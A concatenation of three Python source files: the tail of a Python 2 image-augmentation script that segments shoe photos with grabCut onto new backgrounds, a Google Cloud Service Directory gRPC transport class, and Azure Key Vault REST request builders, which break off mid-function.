def get_img_edge((input_img_file, backgr_img_file, output_img_file, output_txt_file)):
print input_img_file
img = cv2.imread(input_img_file)
top, right, bottom, left, canimg = get_bbox_by_canny(img)
box_w, box_h = right-left, bottom-top
if box_w*box_h > img.shape[1]*img.shape[0]/16.0:
re_img = np.ones((4*box_h, 4*box_w, img.shape[2]), np.uint8)*255
re_top, re_right, re_bottom, re_left = \
box_h*3/2, box_w*5/2, box_h*5/2, box_w*3/2
re_img[re_top:re_bottom, re_left:re_right, :] = img[top:bottom, left:right, :]
top, right, bottom, left, canimg = get_bbox_by_canny(re_img)
img = re_img
width, height = img.shape[1], img.shape[0]
output_labels(top, right, bottom, left, width, height, output_txt_file)
mask = np.zeros(img.shape[:2], np.uint8)
bgdModel = np.zeros((1, 65), np.float64)
fgdModel = np.zeros((1, 65), np.float64)
rect = (left, top, right - left, bottom - top)
cv2.grabCut(img, mask, rect, bgdModel, fgdModel, 3, cv2.GC_INIT_WITH_RECT)
mask2 = np.where((mask==2)|(mask==0), 0, 1).astype('uint8')
img = img*mask2[:, :, np.newaxis]
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (199, 199))
th3 = cv2.dilate(canimg, kernel)
bin_img = cv2.bitwise_and(th3, th3, mask=mask2)
cv2.imwrite('temp.png', img)
cv2.imwrite('temp.bmp', bin_img)
img = Image.open('temp.png')
bin_img = Image.open('temp.bmp')
bg_img = Image.open(backgr_img_file)
img = img.convert("RGBA")
bg_img = bg_img.convert("RGBA")
bg_img = bg_img.resize(img.size)
bg_img.paste(img, (0, 0, img.size[0], img.size[1]), bin_img)
bg_img.save(output_img_file)
def get_bbox_by_canny(img):
grayed = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
grayed = cv2.blur(grayed, (3, 3))
width = grayed.shape[1]
height = grayed.shape[0]
canimg = cv2.Canny(grayed, 50, 80)
if np.max(canimg) == 0:
top = 0
right = width - 1
bottom = height - 1
left = 0
else:
linepix = np.where(canimg == 255)
top = min(linepix[0])
right = max(linepix[1])
bottom = max(linepix[0])
left = min(linepix[1])
return top, right, bottom, left, canimg
def output_labels(top, right, bottom, left, width, height, output_txt_file):
x = (left + right)/2.0
y = (top + bottom)/2.0
w = right - left
h = bottom - top
x, y, w, h = x/width, y/height, w*1.0/width, h*1.0/height
line = array([[0, x, y, w, h]])
np.savetxt(output_txt_file, line, fmt="%d %f %f %f %f")
def get_args():
parser = argparse.ArgumentParser(description = 'get shoes data')
parser.add_argument('-i', dest = 'input_dir',
help = 'input dir of images', default = None, type = str)
parser.add_argument('-b', dest = 'backgr_dir',
help = 'background dir of images', default = None, type = str)
parser.add_argument('-o', dest = 'output_root',
help = 'output root of JPEGImages and labels', default = None, type = str)
parser.add_argument('-c', dest = 'cpu_num',
help = 'cpu number', default = 8, type = int)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
if __name__ == "__main__":
args = get_args()
input_dir = args.input_dir
backgr_dir = args.backgr_dir
output_root = args.output_root
cpu_num = args.cpu_num
tic = time.time()
input_img_list, backgr_img_list, output_img_list, output_txt_list = \
get_file_list(input_dir, backgr_dir, output_root)
'''
pool = Pool(cpu_num)
pool.map(get_img_edge, zip(input_img_list, backgr_img_list, \
output_img_list, output_txt_list))
'''
for arguments in zip(input_img_list, backgr_img_list, output_img_list, output_txt_list):
get_img_edge(arguments)
toc = time.time()
print 'running time: {} seconds'.format(toc-tic) |
py | 1a4faf0201c0420e181bf8fa67b884c627ff8928 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
import google.auth # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.cloud.servicedirectory_v1beta1.types import lookup_service
from .base import LookupServiceTransport, DEFAULT_CLIENT_INFO
class LookupServiceGrpcTransport(LookupServiceTransport):
"""gRPC backend transport for LookupService.
Service Directory API for looking up service data at runtime.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_stubs: Dict[str, Callable]
def __init__(
self,
*,
host: str = "servicedirectory.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for the grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure a mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@classmethod
def create_channel(
cls,
host: str = "servicedirectory.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs,
) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
Raises:
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs,
)
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def resolve_service(
self,
) -> Callable[
[lookup_service.ResolveServiceRequest], lookup_service.ResolveServiceResponse
]:
r"""Return a callable for the resolve service method over gRPC.
Returns a
[service][google.cloud.servicedirectory.v1beta1.Service] and its
associated endpoints. Resolving a service is not considered an
active developer method.
Returns:
Callable[[~.ResolveServiceRequest],
~.ResolveServiceResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "resolve_service" not in self._stubs:
self._stubs["resolve_service"] = self.grpc_channel.unary_unary(
"/google.cloud.servicedirectory.v1beta1.LookupService/ResolveService",
request_serializer=lookup_service.ResolveServiceRequest.serialize,
response_deserializer=lookup_service.ResolveServiceResponse.deserialize,
)
return self._stubs["resolve_service"]
def close(self):
self.grpc_channel.close()
__all__ = ("LookupServiceGrpcTransport",)
|
py | 1a4fafeb6fee22a46eb546f7e1706a35bfc6ac47 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
# fmt: off
def build_create_key_request(
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/create')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str', pattern=r'^[0-9a-zA-Z-]+$'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_import_key_request(
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str', pattern=r'^[0-9a-zA-Z-]+$'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_delete_key_request(
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_update_key_request(
key_name, # type: str
key_version, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/{key-version}')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
"key-version": _SERIALIZER.url("key_version", key_version, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PATCH",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_get_key_request(
key_name, # type: str
key_version, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/{key-version}')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
"key-version": _SERIALIZER.url("key_version", key_version, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_get_key_versions_request(
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
maxresults = kwargs.pop('maxresults', None) # type: Optional[int]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/versions')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = _SERIALIZER.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
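# Illustrative sketch (not generated code): requesting one page of key versions.
# maxresults is validated client-side by _SERIALIZER.query above (minimum=1,
# maximum=25), so out-of-range values fail before anything is sent.
def _example_build_get_key_versions_request():
    request = build_get_key_versions_request(
        key_name="my-key",   # placeholder key name
        api_version="7.1",
        maxresults=25,       # per-page cap; paging via nextLink is handled by the client
    )
    # GET against the relative URL "/keys/my-key/versions" with maxresults and
    # api-version as query parameters; the vault base URL is applied later.
    return request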
def build_get_keys_request(
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
maxresults = kwargs.pop('maxresults', None) # type: Optional[int]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys')
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = _SERIALIZER.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_backup_key_request(
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/backup')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_restore_key_request(
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/restore')
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_encrypt_request(
key_name, # type: str
key_version, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/{key-version}/encrypt')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
"key-version": _SERIALIZER.url("key_version", key_version, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_decrypt_request(
key_name, # type: str
key_version, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/{key-version}/decrypt')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
"key-version": _SERIALIZER.url("key_version", key_version, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_sign_request(
key_name, # type: str
key_version, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/{key-version}/sign')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
"key-version": _SERIALIZER.url("key_version", key_version, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_verify_request(
key_name, # type: str
key_version, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/{key-version}/verify')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
"key-version": _SERIALIZER.url("key_version", key_version, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_wrap_key_request(
key_name, # type: str
key_version, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/{key-version}/wrapkey')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
"key-version": _SERIALIZER.url("key_version", key_version, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_unwrap_key_request(
key_name, # type: str
key_version, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/keys/{key-name}/{key-version}/unwrapkey')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
"key-version": _SERIALIZER.url("key_version", key_version, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_get_deleted_keys_request(
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
maxresults = kwargs.pop('maxresults', None) # type: Optional[int]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/deletedkeys')
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = _SERIALIZER.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_get_deleted_key_request(
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/deletedkeys/{key-name}')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_purge_deleted_key_request(
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/deletedkeys/{key-name}')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_recover_deleted_key_request(
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "7.1") # type: str
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/deletedkeys/{key-name}/recover')
path_format_arguments = {
"key-name": _SERIALIZER.url("key_name", key_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
# fmt: on
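# Illustrative sketch (not generated code): a typical round trip through the
# operations mixin defined below. ``client`` is assumed to be an already
# authenticated generated client that mixes in KeyVaultClientOperationsMixin
# (construction and credentials are out of scope here); the model field names
# and the key-identifier layout are taken from the 7.1 REST schema and should
# be treated as assumptions of this sketch.
def _example_key_round_trip(client, vault_url):
    # Create (or add a new version of) an RSA key.
    created = client.create_key(
        vault_url,
        "example-key",
        _models.KeyCreateParameters(kty="RSA", key_size=2048),
    )
    # The version is the last segment of the key identifier (assumed layout).
    key_version = created.key.kid.rsplit("/", 1)[-1]
    # Encrypt a small payload with the new key, then decrypt it again.
    encrypted = client.encrypt(
        vault_url,
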